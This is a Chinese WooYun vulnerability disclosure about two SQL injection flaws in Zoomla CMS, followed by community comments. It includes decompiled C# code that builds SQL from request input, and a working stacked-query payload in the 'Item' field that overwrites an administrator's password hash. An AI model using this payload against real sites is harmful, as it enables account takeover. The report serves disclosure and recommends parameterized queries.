当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041320

漏洞标题:逐浪CMS通用型SQL注入4+5

相关厂商:逐浪CMS

漏洞作者: wefgod

提交时间:2013-11-19 02:40

修复时间:2014-02-14 02:40

公开时间:2014-02-14 02:40

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-19: 细节已通知厂商并且等待厂商处理中
2013-11-24: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-01-18: 细节向核心白帽子及相关领域专家公开
2014-01-28: 细节向普通白帽子公开
2014-02-07: 细节向实习白帽子公开
2014-02-14: 细节向公众公开

简要描述:

对于厂商那么自信说“这些漏洞都是老漏洞,之前就修复了”这种给力的态度,决定再提交两个吧,当完结篇,同时为了不浪费大家打开页面的时间,就都放在一个里面提交了!
第一个注入点同样是可以直接update的;
第二个注入点还是绕过他那坑爹的“防注入”的。

详细说明:

注入点1:
http://demo.zoomla.cn/User/Pages/ViewSmallPub.aspx?Pubid=3&ID=1
Button3_Click

protected void Button3_Click(object sender, EventArgs e)
	{
		string text = base.Request.Form["Item"]; //给text赋值
		if (!string.IsNullOrEmpty(text) && this.buser.DelModelInfoAllo(this.HiddenTable.Value, text)) //将参数带入删除模块中
		{
			base.Response.Write("<script language=javascript>alert('批量删除成功!');location.href='ViewPub.aspx?pubid=" + this.HiddenPubid.Value + "';</script>");
			return;
		}
		base.Response.Write("<script language=javascript>alert('批量删除失败!请选择您要删除的数据');location.href='ViewPub.aspx?pubid=" + this.HiddenPubid.Value + "';</script>");
	}


this.buser.DelModelInfoAllo(this.HiddenTable.Value, text)
public bool DelModelInfoAllo(string TableName, string ids)
{
	return Sql.Del(TableName, "ID in (" + ids + ")");
}


添加一个回复

image037.png


image039.png


Item= 1); update zl_manager set adminpassword='c4ca4238a0b923820dcc509a6f75849b' where adminname='testuser';--
HiddenTable同为可控参数。

image041.png

漏洞证明:

注入点2:
还是注册页面的啊………………
http://zoomla.cn/User/Register.aspx
找到对应的DLL,发现里面有检查用户名的函数:

private void CheckUserName();
进入该方法
		if (this.buser.IsExit(this.TxtUserName.Text))
		{
			function.WriteErrMsg("<li>该用户名已被他人占用,请输入不同的用户名!</li>");
		}


继续进入到buser.IsExit

public bool IsExit(string userName)
{
	return Sql.IsExist(this.strTableName, "UserName='" + userName + "'");
}


看到这就感觉可能会有SQL注入了,进入Sql.IsExists:

public static bool IsExist(string strTableName, string strWhere)
{
	string strSql = "select count(*) from " + strTableName; //注入
	if (!string.IsNullOrEmpty(strWhere))
	{
		strSql = strSql + " WHERE " + strWhere;
	}
	return SqlHelper.ObjectToInt32(SqlHelper.ExecuteScalar(CommandType.Text, strSql)) > 0;
}


里面防注入的绕过方法看 WooYun: 逐浪CMS通用型SQL注入3
不再多复述了。

修复方案:

过滤、参数化查询

版权声明:转载请注明来源 wefgod@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-02-14 02:40

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2013-10-29 11:27 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    一看逐浪 我就想起了wefgod 再回头看看,果然是洞主!关注关注

  2. 2013-10-29 11:29 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    @梧桐雨 因为数字公司已经不收逐浪了

  3. 2013-10-29 11:39 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @Passer_by 没事~我相信洞主不差那点钱 发乌云远比数字更有价值

  4. 2013-10-29 12:56 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    @梧桐雨 嗯,洞主是伟大的。

  5. 2013-10-29 13:27 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    专注哥,果然

  6. 2013-10-29 19:09 | 在路上 ( 普通白帽子 | Rank:193 漏洞数:13 | 在学习的路上、在成长的路上...)

    伟大哥

  7. 2013-10-30 10:03 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @梧桐雨 不敢……大牛也去过数字提交啊?

  8. 2013-10-30 10:04 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @在路上 @一只猿 不算专注也不伟大!

  9. 2013-10-30 10:10 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    @wefgod 你妹,你不伟大谁伟大?快点给我换遥控飞机

  10. 2013-10-30 14:28 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @Passer_by 洗洗睡吧

  11. 2013-10-30 14:40 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @梧桐雨 @一只猿 @在路上 @Passer_by 逐浪好像来注册了! @逐浪CMS /corp_detail.php?corp=%E9%80%90%E6%B5%AACMS

  12. 2013-10-30 15:40 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    @wefgod 求忽略

  13. 2013-10-30 16:36 | 闪电小子 ( 实习白帽子 | Rank:63 漏洞数:5 | PKAV技术宅社区!---闪电小子!)

    注入按斤算,任意文件下载,目录浏览,文件删除,还有神马getshell。应有尽有。。

  14. 2013-10-30 22:44 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @Passer_by 速度

  15. 2013-10-30 22:53 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @闪电小子 啊哈,好几个都有的

  16. 2013-10-31 21:06 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @xsser 求关联到逐浪CMS去。

  17. 2013-11-06 16:26 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @疯狗 狗哥,邮件发过去似乎木有人帮忙关联下啊

  18. 2013-11-06 19:37 | 在路上 ( 普通白帽子 | Rank:193 漏洞数:13 | 在学习的路上、在成长的路上...)

    怎么给0 难道还可以给负的 这绝对是bug

  19. 2013-11-18 09:32 | 士大夫 ( 实习白帽子 | Rank:88 漏洞数:37 | 杭州WEB安全小组)

    数字公司是神马?

  20. 2013-11-19 09:50 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @疯狗 是不是厂商没收到邮件或者是现在这个状态厂商无法确认了…………

  21. 2013-11-19 11:50 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @wefgod 我给厂商写信了

  22. 2013-11-20 10:46 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @疯狗 哦这样吗,确认了一个原来忽略的,给了1rank哈哈。目前后面还没看见消息。

  23. 2013-11-21 18:38 | 建建滴忘问 ( 路人 | Rank:0 漏洞数:1 | 码农And红客)

    @wefgod 哈哈 厂商之前被我拉进来了

  24. 2013-11-22 18:51 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @建建滴忘问 反正都是忽略。之前他们的拿shell方法太多了。

  25. 2013-12-02 15:21 | 建建滴忘问 ( 路人 | Rank:0 漏洞数:1 | 码农And红客)

    @wefgod 唉 说出来都是泪啊……当初怎么就没把他的服务器数据统统打包呢!

  26. 2013-12-02 15:47 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @建建滴忘问 万万不可啊 会慢慢跟厂商沟通重视安全

  27. 2013-12-03 10:05 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @疯狗 狗哥,感谢你啊

  28. 2013-12-03 19:22 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @wefgod 吃水不忘挖井人啊,去朋友圈给宣传个?

  29. 2013-12-04 09:10 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @疯狗 哈哈,低调点。朋友圈没有太多可以来乌云混的人……有的话他们都知道的